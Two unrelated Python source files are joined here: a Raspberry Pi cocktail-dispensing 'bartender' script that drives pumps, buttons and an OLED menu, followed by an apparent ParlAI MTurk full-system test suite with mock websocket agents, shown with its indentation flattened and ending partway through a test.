GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 128
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 200
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 200
STATE_UNKNOWN = "Unknown"
STATE_INITIALIZING = "Initializing"
STATE_RUNNING = "Running"
STATE_WAITING = "Waiting..."
STATE_SLEEPING = "Sleeping"
STATE_POURING = "Pouring..."
STATE_POUR_FINISHED = "Enjoy your drink!"
STATE_CLEANING = "Cleaning..."
STATE_SHUTDOWN = "Please wait 10 seconds to power off"
SLEEP_TIMEOUT = 30
machine_state = STATE_INITIALIZING
prev_machine_state = STATE_UNKNOWN
display_machine_state = STATE_UNKNOWN
start_time = time.time()
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/500.0
# Raspberry Pi pin configuration:
RST = 14
# Note the following are only used with SPI:
DC = 15
SPI_PORT = 0
SPI_DEVICE = 0
#Fontsize and Font Type Settings
FONTSIZE = 15
FONTFILE = "cambriab.ttf"
# Wrap text for a better view on the OLED screen (a width of 13 characters works well here)
WRAPPER = textwrap.TextWrapper(width=13)
class Bartender(MenuDelegate):
def __init__(self):
self.machine_state = STATE_INITIALIZING
self.display_machine_state = self.machine_state
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
GPIO.setmode(GPIO.BCM)
        # configure interrupts for the buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.add_event_detect(LEFT_BTN_PIN, GPIO.FALLING, callback=self.left_btn, bouncetime=100)
GPIO.add_event_detect(RIGHT_BTN_PIN, GPIO.FALLING, callback=self.right_btn, bouncetime=100)
# configure screen
spi_bus = 0
spi_device = 0
#Load the display driver.
OLED.Device_Init()
self.image = Image.new("RGB", (self.screen_width, self.screen_height), "BLACK")
self.draw = ImageDraw.Draw(self.image)
self.font = ImageFont.truetype(FONTFILE ,FONTSIZE)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
print ("Done initializing")
self.machine_state = STATE_WAITING
self.display_machine_state = STATE_WAITING
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
# adds an option that shuts down the rpi
configuration_menu.addOption(MenuItem('shutdown', 'Shutdown'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
elif(menuItem.type == "shutdown"):
self.shutdown()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.machine_state = STATE_CLEANING
self.display_machine_state = self.machine_state
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar - something isn't right with the progress bar: it lasts significantly longer than the pumping
# self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2)
self.machine_state = STATE_WAITING
def shutdown(self):
self.display_machine_state = STATE_SHUTDOWN
self.menuContext.showMenu()  # redraw the display so the shutdown notice in display_machine_state is visible
time.sleep(5)
OLED.Clear_Screen()
#Clean shutdown device
subprocess.Popen(['shutdown','-h','now'])
def displayMenuItem(self, menuItem):
print (menuItem.name)
self.draw.rectangle([0,0,self.screen_width,self.screen_height], fill="BLACK",)
self.draw.text((0,12), menuItem.name, fill = "BLUE", font = self.font)
self.draw.text((0,30), self.display_machine_state, fill = "ORANGE", font = self.font)
OLED.Clear_Screen()
OLED.Display_Image(self.image)
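# cycleLights and lightsEndingSequence below drive an addressable LED strip
# (see the NEOPIXEL_* constants) through self.strip and self.numpixels, but
# those attributes are only created by the pixel setup that is commented out
# in __init__ ("# setup pixels:"), so calling them as-is raises AttributeError.
# The corresponding calls in makeDrink are also commented out.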
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
while getattr(t, "do_run", True):
self.strip.setPixelColor(head, color) # Turn on 'head' pixel
self.strip.setPixelColor(tail, 0) # Turn off 'tail'
self.strip.show() # Refresh strip
time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
head += 1 # Advance head position
if(head >= self.numpixels): # Off end of strip?
head = 0 # Reset to start
color >>= 8 # Red->green->blue->black
if(color == 0): color = 0xFF0000 # If black, reset to red
tail += 1 # Advance tail position
if(tail >= self.numpixels): tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0xFF0000)
self.strip.show()
time.sleep(5)
# turn lights off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100
for x in range(1, 101):
self.updateProgressBar(x, y=35)
OLED.Display_Image(self.image)
time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.prev_machine_state = self.machine_state
self.machine_state = STATE_POURING
self.display_machine_state = self.machine_state
# launch a thread to control lighting
# lightsThread = threading.Thread(target=self.cycleLights)
# lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] * FLOW_RATE
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
# print("maxtime: " + str(maxTime))
# self.progressBar(maxTime)
self.menuContext.showMenu()
# wait for threads to finish
for thread in pumpThreads:
thread.join()
self.machine_state = STATE_POUR_FINISHED
self.display_machine_state = self.machine_state
self.menuContext.showMenu()
time.sleep(2)
self.machine_state = STATE_WAITING
self.display_machine_state = self.machine_state
# show the main menu
#self.menuContext.showMenu()
# stop the light thread
# lightsThread.do_run = False
# lightsThread.join()
# show the ending sequence lights
# self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
#time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.start_time = time.time()
def left_btn(self, ctx):
if self.machine_state != STATE_RUNNING:
self.prev_machine_state = self.machine_state
self.machine_state = STATE_RUNNING
self.display_machine_state = self.prev_machine_state
self.start_time = time.time()
if (self.prev_machine_state == STATE_SLEEPING):
self.display_machine_state = STATE_WAITING
self.menuContext.showMenu()
print("LEFT button press woke from sleep")
elif (self.prev_machine_state == STATE_WAITING):
self.menuContext.advance()
print("LEFT button press advanced menu")
else:
print("ignored LEFT button press")
self.machine_state = STATE_WAITING
self.prev_machine_state = STATE_WAITING
def right_btn(self, ctx):
if self.machine_state != STATE_RUNNING:
self.prev_machine_state = self.machine_state
self.machine_state = STATE_RUNNING
self.display_machine_state = self.prev_machine_state
self.start_time = time.time()
if (self.prev_machine_state == STATE_SLEEPING):
self.display_machine_state = STATE_WAITING
self.menuContext.showMenu()
print("RIGHT button press woke from sleep")
elif (self.prev_machine_state == STATE_WAITING):
self.menuContext.select()
print("RIGHT button press selected menu item")
else:
print("ignored RIGHT button press")
self.machine_state = STATE_WAITING
self.prev_machine_state = STATE_WAITING
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
for w in range(0, width):
self.draw.point((w + x, y), fill=255)
self.draw.point((w + x, y + height), fill=255)
for h in range(0, height):
self.draw.point((x, h + y), fill=255)
self.draw.point((self.screen_width-x, h + y), fill=255)
for p in range(0, percent):
p_loc = int(p/100.0*width)
self.draw.point((x + p_loc, h + y), fill=255)
def run(self):
self.start_time = time.time()
# main loop
try:
while True:
# disable OLED screen if no activity for SLEEP_TIMEOUT seconds to prevent burning out screen
if ((time.time() - self.start_time) > SLEEP_TIMEOUT) and (self.machine_state != STATE_SLEEPING):
self.machine_state = STATE_SLEEPING
self.display_machine_state = self.machine_state
OLED.Clear_Screen()
except KeyboardInterrupt:
OLED.Clear_Screen()
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
test_full_system.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import time
import uuid
import os
from unittest import mock
from parlai.mturk.core.dev.socket_manager import Packet, SocketManager
from parlai.mturk.core.dev.worlds import MTurkOnboardWorld, MTurkTaskWorld
from parlai.mturk.core.dev.agents import AssignState
from parlai.mturk.core.dev.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.dev.mturk_manager as MTurkManagerFile
import parlai.mturk.core.dev.data_model as data_model
import parlai.mturk.core.dev.shared_utils as shared_utils
import threading
from websocket_server import WebsocketServer
import json
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
# Let's ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
MESSAGE_ID_3 = 'MESSAGE_ID_3'
MESSAGE_ID_4 = 'MESSAGE_ID_4'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_ACT
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE,
AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING,
AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE,
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
TASK_GROUP_ID_1 = 'TASK_GROUP_ID_1'
SocketManager.DEF_MISSED_PONGS = 1
SocketManager.DEF_DEAD_TIME = 0.4
shared_utils.THREAD_SHORT_SLEEP = 0.05
shared_utils.THREAD_MEDIUM_SLEEP = 0.15
MTurkManagerFile.WORLD_START_TIMEOUT = 2
TOPIC_ARN = 'topic_arn'
QUALIFICATION_ID = 'qualification_id'
HIT_TYPE_ID = 'hit_type_id'
MTURK_PAGE_URL = 'mturk_page_url'
FAKE_HIT_ID = 'fake_hit_id'
class TestMTurkWorld(MTurkTaskWorld):
def __init__(self, workers, use_episode_done):
self.workers = workers
def episode_done():
return use_episode_done()
self.episode_done = episode_done
def parley(self):
for worker in self.workers:
worker.assert_connected()
time.sleep(0.5)
def shutdown(self):
for worker in self.workers:
worker.shutdown()
class TestMTurkOnboardWorld(MTurkOnboardWorld):
def __init__(self, mturk_agent, use_episode_done):
self.mturk_agent = mturk_agent
def episode_done():
return use_episode_done()
self.episode_done = episode_done
def parley(self):
self.mturk_agent.assert_connected()
time.sleep(0.5)
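# Polls val_func every 100 ms and fails the calling test if it has not returned
# val within max_time seconds.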
def assert_equal_by(val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert (
time.time() - start_time < max_time
), "Value was not attained in specified time, last {}".format(val_func())
time.sleep(0.1)
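# MockSocket stands in for the routing server: it runs a local WebsocketServer,
# acknowledges WORLD_ALIVE with a conn_success message, answers WORLD_PING
# packets with SERVER_PONG, and forwards anything carrying a receiver_id to the
# handler that a MockAgent registered for that worker.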
class MockSocket:
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['type'] == data_model.WORLD_PING:
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(
client,
json.dumps({'type': data_model.SERVER_PONG, 'content': pong}),
)
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
use_func = self.handlers.get(receiver_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket, name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class MockAgent(object):
"""
Class that pretends to be an MTurk agent interacting through the webpage by
simulating the same commands that are sent from the core.html file.
Exposes methods to use for testing and checking status
"""
def __init__(self, hit_id, assignment_id, worker_id, task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.ws = None
self.ready = False
self.wants_to_send = False
self.message_packet = []
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.MESSAGE_BATCH
self.ws.send(json.dumps({'type': event_name, 'content': packet.as_dict()}))
def register_to_socket(self, ws, on_msg=None):
if on_msg is None:
def on_msg(packet):
self.message_packet.append(packet)
if packet.type == data_model.AGENT_STATE_CHANGE:
if 'conversation_id' in packet.data:
self.conversation_id = packet.data['conversation_id']
if 'agent_id' in packet.data:
self.id = packet.data['agent_id']
handler = self.make_packet_handler(on_msg)
self.ws = ws
self.ws.handlers[self.worker_id] = handler
def make_packet_handler(self, on_msg):
"""
A packet handler.
"""
def handler_mock(pkt):
if pkt['type'] == data_model.WORLD_MESSAGE:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.MESSAGE_BATCH:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.AGENT_STATE_CHANGE:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.AGENT_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception(
'Invalid Packet type {} received in {}'.format(pkt['type'], pkt)
)
return handler_mock
def build_and_send_packet(self, packet_type, data):
msg_id = str(uuid.uuid4())
msg = {
'id': msg_id,
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data,
}
if packet_type == data_model.MESSAGE_BATCH:
msg['data'] = {
'messages': [
{
'id': msg_id,
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data,
}
]
}
self.ws.send(json.dumps({'type': packet_type, 'content': msg}))
return msg['id']
def send_message(self, text):
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False,
}
self.wants_to_send = False
return self.build_and_send_packet(data_model.MESSAGE_BATCH, data)
def send_disconnect(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id,
'connection_id': '{}_{}'.format(self.worker_id, self.assignment_id),
}
return self.build_and_send_packet(data_model.AGENT_DISCONNECT, data)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id,
}
return self.build_and_send_packet(data_model.AGENT_ALIVE, data)
class TestMTurkManagerWorkflows(unittest.TestCase):
"""
Various test cases to replicate a whole mturk workflow.
"""
def setUp(self):
patcher = mock.patch('builtins.input', return_value='y')
self.addCleanup(patcher.stop)
patcher.start()
# Mock functions that hit external APIs and such
self.server_utils = MTurkManagerFile.server_utils
self.mturk_utils = MTurkManagerFile.mturk_utils
self.server_utils.setup_server = mock.MagicMock(
return_value='https://127.0.0.1'
)
self.server_utils.setup_legacy_server = mock.MagicMock(
return_value='https://127.0.0.1'
)
self.server_utils.delete_server = mock.MagicMock()
self.mturk_utils.setup_aws_credentials = mock.MagicMock()
self.mturk_utils.calculate_mturk_cost = mock.MagicMock(return_value=1)
self.mturk_utils.check_mturk_balance = mock.MagicMock(return_value=True)
self.mturk_utils.create_hit_config = mock.MagicMock()
self.mturk_utils.setup_sns_topic = mock.MagicMock(return_value=TOPIC_ARN)
self.mturk_utils.delete_sns_topic = mock.MagicMock()
self.mturk_utils.delete_qualification = mock.MagicMock()
self.mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID
)
self.mturk_utils.find_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID
)
self.mturk_utils.give_worker_qualification = mock.MagicMock()
self.mturk_utils.remove_worker_qualification = mock.MagicMock()
self.mturk_utils.create_hit_type = mock.MagicMock(return_value=HIT_TYPE_ID)
self.mturk_utils.subscribe_to_hits = mock.MagicMock()
self.mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=(MTURK_PAGE_URL, FAKE_HIT_ID, 'MTURK_HIT_DATA')
)
self.mturk_utils.get_mturk_client = mock.MagicMock(
return_value=mock.MagicMock()
)
self.onboarding_agents = {}
self.worlds_agents = {}
# Set up an MTurk Manager and get it ready for accepting workers
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['frontend_version'] = 1
self.opt['assignment_duration_in_seconds'] = 1
self.opt['hit_title'] = 'test_hit_title'
self.opt['hit_description'] = 'test_hit_description'
self.opt['task_description'] = 'test_task_description'
self.opt['hit_keywords'] = 'test_hit_keywords'
self.opt['reward'] = 0.1
self.opt['is_debug'] = True
self.opt['log_level'] = 0
self.opt['num_conversations'] = 1
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager.setup_server()
self.mturk_manager.start_new_run()
self.mturk_manager.ready_to_accept_workers()
self.mturk_manager.set_get_onboard_world(self.get_onboard_world)
self.mturk_manager.create_hits()
def assign_worker_roles(workers):
workers[0].id = 'mturk_agent_1'
workers[1].id = 'mturk_agent_2'
def run_task_wait():
self.mturk_manager.start_task(
lambda w: True, assign_worker_roles, self.get_task_world
)
self.task_thread = threading.Thread(target=run_task_wait)
self.task_thread.start()
self.agent_1 = MockAgent(
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1, TASK_GROUP_ID_1
)
self.agent_1_2 = MockAgent(
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_3, TEST_WORKER_ID_1, TASK_GROUP_ID_1
)
self.agent_2 = MockAgent(
TEST_HIT_ID_2, TEST_ASSIGNMENT_ID_2, TEST_WORKER_ID_2, TASK_GROUP_ID_1
)
def tearDown(self):
for key in self.worlds_agents.keys():
self.worlds_agents[key] = True
self.mturk_manager.shutdown()
self.fake_socket.close()
if self.task_thread.is_alive():
self.task_thread.join()
def get_onboard_world(self, mturk_agent):
self.onboarding_agents[mturk_agent.worker_id] = False
def episode_done():
return not (
(mturk_agent.worker_id in self.onboarding_agents)
and (self.onboarding_agents[mturk_agent.worker_id] is False)
)
return TestMTurkOnboardWorld(mturk_agent, episode_done)
def get_task_world(self, mturk_manager, opt, workers):
for worker in workers:
self.worlds_agents[worker.worker_id] = False
def episode_done():
for worker in workers:
if self.worlds_agents[worker.worker_id] is False:
return False
return True
return TestMTurkWorld(workers, episode_done)
def alive_agent(self, agent):
agent.register_to_socket(self.fake_socket)
agent.send_alive()
time.sleep(0.3)
def test_successful_convo(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_1_object.set_completed_act({})
agent_2_object.set_completed_act({})
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
def test_disconnect_end(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Disconnect agent
agent_2.send_disconnect()
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_PARTNER_DISCONNECT, 3
)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DISCONNECT, 3)
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
# assert conversation not marked as complete
self.assertEqual(manager.completed_conversations, 0)
agent_1_object.set_completed_act({})
def test_expire_onboarding(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 10)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
self.onboarding_agents[agent_1.worker_id] = True
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_EXPIRED)
def test_attempt_break_unique(self):
manager = self.mturk_manager
unique_worker_qual = 'is_unique_qual'
manager.is_unique = True
manager.opt['unique_qual_name'] = unique_worker_qual
manager.unique_qual_name = unique_worker_qual
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_1_object.set_completed_act({})
